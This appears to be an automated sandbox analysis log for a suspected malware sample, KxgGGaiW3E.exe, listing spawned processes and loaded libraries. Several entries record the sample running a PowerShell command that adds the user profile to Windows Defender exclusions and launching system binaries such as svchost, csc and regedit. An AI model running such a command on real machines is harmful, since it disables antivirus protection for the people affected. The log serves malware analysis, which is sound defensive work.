Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,18279504130272871239,1243418513114917448,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=608 --field-trial-handle=1972,i,16479660562393968934,10937071673119511898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\KxgGGaiW3E.exe "C:\Users\user\KxgGGaiW3E.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: unknown	Process created: C:\Users\user\KxgGGaiW3E.exe "C:\Users\user\KxgGGaiW3E.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1876,i,14537101740333488740,3287298464352964342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,6191957489455060914,12654374120200284850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,18279504130272871239,1243418513114917448,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=608 --field-trial-handle=1972,i,16479660562393968934,10937071673119511898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1876,i,14537101740333488740,3287298464352964342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,6191957489455060914,12654374120200284850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
